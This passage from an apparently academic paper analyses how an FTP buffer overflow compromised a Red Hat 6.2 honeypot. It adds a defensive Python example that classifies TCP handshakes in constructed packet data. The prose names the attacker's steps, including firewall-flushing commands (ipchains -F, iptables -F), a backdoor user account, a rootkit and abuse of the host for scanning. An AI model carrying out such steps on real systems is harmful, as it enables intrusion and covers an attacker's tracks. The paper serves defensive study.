5.4.1. Attack mechanism
The attacker used a buffer overflow to overwrite the honeypot's memory with their own commands. The initial commands include installing unknown programs and adding a user account for future legitimate access. It is interesting to note that, based on the data extracted, the attacker flushed out all firewall rules inside the honeypot system with the ipchains -F and iptables -F commands. The attacker later installs a rootkit to tighten their control of the server.

6. HACKING TO ABUSE PROCESSES DISCUSSION
Figure 3 shows the summary of the Redhat 6.2 hacking towards abuse processes.

6.1. Reconnaissance/Scanning -> Gaining Access -> Escalating Privileges & Covering Tracks
The source sends a TCP SYN scan to determine whether the targeted host runs a vulnerable FTP server (like ours). It then exploits the server's buffer overflow, installs a script downloaded from 206.253.222.88 and adds the user name raul to the system. The source of the attack is a computer from India (based on the source IP). From the speed of the overall initial process, it is believed that the attacker used automated tools for scanning and gaining the first entrance.

A few hours later, the attacker logs in (from a computer in Romania) using the telnet protocol with the username that his tool had previously created for him (which enables us to monitor his activity, since telnet is a clear text protocol). After that the attacker downloads and installs a rootkit from a paid webhosting account with Yahoo. It is not known to whom this account belongs, as there is some possibility that the account is a stolen account (the researchers' attempt to access the account with the same username and password a few days later failed). The rootkit replaced most system files and deleted log files to ensure its invisibility.
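Two claims in sections 5.3.5 and 6.1 rest on TCP handshake state: that the attacker's source address cannot have been spoofed because the three-way handshake completed, and that the initial reconnaissance was a SYN scan. The following Python is an added example, not analysis code from the paper: it replays a packet list through a small handshake state machine and reports which clients completed a handshake (so they really received the server's SYN-ACK at the address they claimed), which probed several targets without ever completing one (SYN-scan behaviour, which is also what the compromised honeypot later did to other hosts), and which SYNs drew a SYN-ACK that was never answered (consistent with a spoofed or unreachable source). The packets are constructed: 203.197.136.8 and 219.95.189.49 are the attacker and honeypot addresses reported in the paper, while 198.51.100.9 and the 203.0.113.x hosts are fictitious.

```python
from collections import defaultdict

# TCP flag bits as laid out in the TCP header's flags field.
FIN, SYN, RST, ACK = 0x01, 0x02, 0x04, 0x10

# Constructed packet list, not captured data: (src, sport, dst, dport, flags).
# 203.197.136.8 and 219.95.189.49 are the attacker and honeypot addresses
# reported in the paper; 198.51.100.9 and 203.0.113.x are fictitious.
SAMPLE_PACKETS = [
    # attacker half-open probes port 21 on the honeypot: SYN, SYN-ACK, RST
    ("203.197.136.8", 3100, "219.95.189.49", 21, SYN),
    ("219.95.189.49", 21, "203.197.136.8", 3100, SYN | ACK),
    ("203.197.136.8", 3100, "219.95.189.49", 21, RST),
    # then a real connection to the FTP service: full three-way handshake
    ("203.197.136.8", 3127, "219.95.189.49", 21, SYN),
    ("219.95.189.49", 21, "203.197.136.8", 3127, SYN | ACK),
    ("203.197.136.8", 3127, "219.95.189.49", 21, ACK),
    # a SYN with a spoofed or unreachable source: the SYN-ACK is never answered
    ("198.51.100.9", 40000, "219.95.189.49", 21, SYN),
    ("219.95.189.49", 21, "198.51.100.9", 40000, SYN | ACK),
    # later the compromised honeypot itself SYN-scans other hosts for FTP
    ("219.95.189.49", 1025, "203.0.113.10", 21, SYN),
    ("203.0.113.10", 21, "219.95.189.49", 1025, SYN | ACK),
    ("219.95.189.49", 1025, "203.0.113.10", 21, RST),
    ("219.95.189.49", 1026, "203.0.113.11", 21, SYN),
    ("203.0.113.11", 21, "219.95.189.49", 1026, RST | ACK),  # port closed
    ("219.95.189.49", 1027, "203.0.113.12", 21, SYN),         # no reply at all
]


def track_flows(packets):
    """Replay packets through a minimal handshake state machine.

    Returns {(client, cport, server, sport): state} with state one of
    syn-sent, syn-ack-seen, established, half-open-reset or refused.
    """
    flows = {}
    for src, sport, dst, dport, flags in packets:
        if flags & SYN and not flags & ACK:          # new connection attempt
            flows[(src, sport, dst, dport)] = "syn-sent"
            continue
        reply_key = (dst, dport, src, sport)         # server -> client direction
        if reply_key in flows:
            state = flows[reply_key]
            if flags & SYN and flags & ACK and state == "syn-sent":
                flows[reply_key] = "syn-ack-seen"
            elif flags & RST and state == "syn-sent":
                flows[reply_key] = "refused"
            continue
        key = (src, sport, dst, dport)               # client -> server direction
        if key in flows and flows[key] == "syn-ack-seen":
            if flags & RST:
                flows[key] = "half-open-reset"       # classic SYN-scan signature
            elif flags & ACK and not flags & SYN:
                flows[key] = "established"           # handshake completed


    return flows


def completed_handshakes(flows):
    """Clients that finished the three-way handshake. Such a client must have
    received the server's SYN-ACK at the address it claimed, which is why a
    completed handshake rules out a blindly spoofed source (section 5.3.5)."""
    return sorted({client for (client, _, _, _), st in flows.items() if st == "established"})


def syn_scan_sources(flows, min_targets=2):
    """Clients that probed at least min_targets distinct (host, port) pairs
    without completing a handshake to them (the SYN scan of section 6.1)."""
    probes = defaultdict(set)
    for (client, _, server, port), st in flows.items():
        if st != "established":
            probes[client].add((server, port))
    return sorted(c for c, targets in probes.items() if len(targets) >= min_targets)


def unanswered_synacks(flows):
    """Clients whose SYN drew a SYN-ACK that was never acknowledged or reset:
    consistent with a spoofed or unreachable source address (or packet loss)."""
    return sorted({client for (client, _, _, _), st in flows.items() if st == "syn-ack-seen"})


if __name__ == "__main__":
    flows = track_flows(SAMPLE_PACKETS)
    for (client, cport, server, sport), state in flows.items():
        print(f"{client}:{cport} -> {server}:{sport}  {state}")
    print("completed handshakes:", completed_handshakes(flows))
    print("SYN-scan sources:", syn_scan_sources(flows))
    print("unanswered SYN-ACKs:", unanswered_synacks(flows))
```

On a real tcpdump file the same logic applies per flow after reading the TCP flags out of each packet; the point of the example is the reasoning: the attacker's own probe of port 21 shows as half-open-reset, the FTP login that followed shows as established, and only the latter justifies the paper's conclusion that the address was genuine.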

Figure 3 Redhat 6.2 Attack Process Diagram (diagram not reproduced in the text)

6.2. Information Gathering
After gaining access and root privileges, the attacker sends an email containing the system profile, such as IP address, processor, hard disk space and ping statistics, to an email address which is believed to belong to the attacker. After that, the attacker launches an ICMP broadscan, which is assumed to determine the available network computers or resources within the honeypot's network. This attack accounts for 95% of the overall alerts generated by Snort.

6.3. Abuse
The honeypot is then abused by the attacker. The first abuse is that it is used to host an IRC bot within several IRC channels. Later, the honeypot is used to scan the internet to collect vulnerable FTP server IP addresses. As stated previously, the last abuse forced us to cut short the honeypot's life time by disconnecting the TMNet Streamyx modem.

7. CONCLUSION

The deployed honeypot provided an insight into how a hacker (or script kiddy) hacks their way into a system [8-9]. It provides valuable information and confirmation of known cracker methodology from reconnaissance to gaining access and abuse [10-11]. However, this research also shows that one disadvantage of the honeypot is that it could be used as a platform to attack other targets [12]. The abuses forced us to cut short the honeypot's life, to avoid any liability.

The Redhat 6.2 honeypot was hacked within its first day online. Even though Redhat 6.2 is an outdated operating system, the danger is not limited to the OS alone [13]. It is shown that attackers will exploit vulnerable software to gain entry to their target host. The only reason they still used an old exploit is because it still worked (which means old systems with known vulnerabilities still exist). A firewall implementation can help to eradicate unwanted traffic. Users must always update their systems and disable any services that they do not need.

8. REFERENCES

[1] David Raikow (2000), ZDNet Article: Building your own Honeypot. Retrieved 20 March 2006 from http://www.zdnet.com.au/news/security/soa/Building_your_own_honeypot/0,2000061744,20106785,00.htm
[2] Lance Spitzner (2000), Building A Honeypot. Retrieved November 14, 2005 from http://rootprompt.org/article.php3?article=210
[3] Reto Baumann and Christian Plattner (2001), White Paper: Honeypot. Retrieved 23 Nov 2005 from http://www.inf.ethz.ch/~plattner/pdf/whitepaper.pdf
[4] Honeynet Project (2003), Know Your Enemy: Honeynet. Retrieved 23 Nov 2005 from http://www.honeynet.org/papers/honeynet/index.html
[5] David J Marchette (2001), Computer Intrusion Detection and Network Monitoring: A Statistical Viewpoint. Virginia: Springer.
[6] Kuik, B.V. (2001), Intrusion Detection Systems: General Overview and Technical Insights. Retrieved Nov 12, 2003 from http://www.vankuik.nl/bart/docs/report.pdf
[7] Kunikazu Yoda and Hiroaki Etoh (2000), Finding a Connection Chain for Tracing Intruders, in 6th European Symposium on Research in Computer Security, Toulouse, France, October 2000.
[8] Honeynet Project (2000), Know Your Enemy: Motives. Retrieved 23 Nov 2005 from http://www.honeynet.org/papers/motives/
[9] Lance Spitzner (2002), Honeypots: Tracking Hackers. Boston: Addison Wesley.
[10] Stuart McClure, Joel Scambray & George Kurtz (2003), Hacking Exposed, 4th Edition. California: McGraw Hill.
[11] EC-Council (2003), Participant Handout for Ethical Hacking Workshop.
[12] Lance Spitzner (2003), Honeypots: Are they illegal? Retrieved November 28, 2005 from http://www.securityfocus.com/infocus/1703
[13] Stephen Holcroft (2002), Incident Analysis of a Compromised RedHat Linux 6.2 Honeypot. Retrieved 20 March 2006 from http://www.holcroft.org/honeypot/Incident/sholcroft-4.1-2002.html
